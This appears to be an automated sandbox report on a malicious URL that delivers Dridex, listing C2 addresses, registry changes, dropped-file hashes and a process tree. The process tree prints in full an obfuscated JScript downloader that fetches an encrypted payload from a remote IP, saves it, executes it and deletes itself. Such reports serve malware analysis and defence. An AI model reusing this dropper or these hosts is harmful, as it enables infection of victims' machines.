Overview
overview
10Static
static
URLScan
urlscan
https://ankltraffice...
windows7_x64
6https://ankltraffice...
windows7_x64
1https://ankltraffice...
windows7_x64
1https://ankltraffice...
windows7_x64
1https://ankltraffice...
windows10_x64
10https://ankltraffice...
windows10_x64
10https://ankltraffice...
windows10_x64
10https://ankltraffice...
windows10_x64
10https://ankltraffice...
windows10_x64
Analysis
-
max time kernel
135s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en -
submitted
10-09-2021 00:52
Static task
static1
URLScan task
urlscan1
Sample
https://ankltrafficexit.xyz/trafficexit
Behavioral task
behavioral1
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7-jp
Behavioral task
behavioral2
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7-fr
Behavioral task
behavioral3
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7v20210408
Behavioral task
behavioral4
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7-de
Behavioral task
behavioral5
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10v20210408
Behavioral task
behavioral6
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-jp
Behavioral task
behavioral7
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-fr
Behavioral task
behavioral8
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-en
Behavioral task
behavioral9
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-de
General
Malware Config
Extracted
dridex
10111
104.152.111.198:9676
92.247.29.75:10172
133.242.136.130:8194
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 26 3092 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
mgbzb.exepid process 4080 mgbzb.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
mgbzb.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mgbzb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
IEXPLORE.EXEiexplore.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30909918" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3255464718" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30909918" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30909918" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "338016942" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E329BF61-11D1-11EC-A248-6E4370BFA843} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3120777136" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3120933669" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30909918" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3255464718" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "338048933" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338000348" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 3808 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 3808 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 3808 iexplore.exe 3808 iexplore.exe 1384 IEXPLORE.EXE 1384 IEXPLORE.EXE 1384 IEXPLORE.EXE 1384 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 3808 wrote to memory of 1384 3808 iexplore.exe IEXPLORE.EXE PID 3808 wrote to memory of 1384 3808 iexplore.exe IEXPLORE.EXE PID 3808 wrote to memory of 1384 3808 iexplore.exe IEXPLORE.EXE PID 1384 wrote to memory of 2996 1384 IEXPLORE.EXE cmd.exe PID 1384 wrote to memory of 2996 1384 IEXPLORE.EXE cmd.exe PID 1384 wrote to memory of 2996 1384 IEXPLORE.EXE cmd.exe PID 2996 wrote to memory of 3092 2996 cmd.exe wscript.exe PID 2996 wrote to memory of 3092 2996 cmd.exe wscript.exe PID 2996 wrote to memory of 3092 2996 cmd.exe wscript.exe PID 3092 wrote to memory of 2728 3092 wscript.exe cmd.exe PID 3092 wrote to memory of 2728 3092 wscript.exe cmd.exe PID 3092 wrote to memory of 2728 3092 wscript.exe cmd.exe PID 2728 wrote to memory of 4080 2728 cmd.exe mgbzb.exe PID 2728 wrote to memory of 4080 2728 cmd.exe mgbzb.exe PID 2728 wrote to memory of 4080 2728 cmd.exe mgbzb.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3808 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NDc2NTc3&FwZgo&dsfdffg43t=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7LPRAOzrlyCelTVo_AsJONUPQDn2UaIfgdpydxdAFsR8_2piUDQzUKU05bT9UaIUQlG-aLIVLA46A&cxssdvxcv=110mpinny.93an92.406p2g8u8&sdfsdfdfg=twix&ogfgafgn4=w3_QMvXcJx7QFYPJKfrcT&fhfghddfsdf=diet&qWOMaFdXKMjE0Mjg=" "2"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NDc2NTc3&FwZgo&dsfdffg43t=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7LPRAOzrlyCelTVo_AsJONUPQDn2UaIfgdpydxdAFsR8_2piUDQzUKU05bT9UaIUQlG-aLIVLA46A&cxssdvxcv=110mpinny.93an92.406p2g8u8&sdfsdfdfg=twix&ogfgafgn4=w3_QMvXcJx7QFYPJKfrcT&fhfghddfsdf=diet&qWOMaFdXKMjE0Mjg=" "2"4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c mgbzb.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mgbzb.exemgbzb.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\AX9VL96L.cookieMD5
1f403453c8c06f592ef85359cf8ea515
SHA1149510271bb735493648f48063b1f4b41e82c6b0
SHA256f5d9f42581ec5d3e2ebe4b11d7e378df3531b24c6a7391bcbdf3504ecc882ba3
SHA512cc26499c5c36f793967d4f9bca2253e638a5c384f28cbfcd5b3881a8a8007c8971452c6159f890aa33191b8d8ca217cc75dca892029ad92985308c23dc9a51d1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\KH5DLZTJ.cookieMD5
67fb146c5b5deec4419b893b40508d85
SHA15915e27de1f97f5e77339ce61ddd401e5a847840
SHA256323e48286be512fd8b4d492e2012170a7904488469610de19d1ecdbbd9ea09e6
SHA5125712417ffc5f0de6474480d488b665196a3e098f09f661a36360b736a934ecc106c1f4fb73ff21b40b882a9a7536d99c9c0db8adcbca9de54b58299af6238536
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\mgbzb.exeMD5
223dc24b1075564c200030321e21ee09
SHA176fdfb19ae4f9de19f5c039c16fd519a5f96027f
SHA2569ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280
SHA51229f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277
-
C:\Users\Admin\AppData\Local\Temp\mgbzb.exeMD5
223dc24b1075564c200030321e21ee09
SHA176fdfb19ae4f9de19f5c039c16fd519a5f96027f
SHA2569ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280
SHA51229f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277
-
memory/1384-116-0x0000000000000000-mapping.dmp
-
memory/2728-120-0x0000000000000000-mapping.dmp
-
memory/2996-117-0x0000000000000000-mapping.dmp
-
memory/3092-118-0x0000000000000000-mapping.dmp
-
memory/3808-115-0x00007FFCAE9E0000-0x00007FFCAEA4B000-memory.dmpFilesize
428KB
-
memory/4080-121-0x0000000000000000-mapping.dmp
-
memory/4080-125-0x0000000000400000-0x000000000051A000-memory.dmpFilesize
1.1MB
-
memory/4080-124-0x00000000005B0000-0x00000000006FA000-memory.dmpFilesize
1.3MB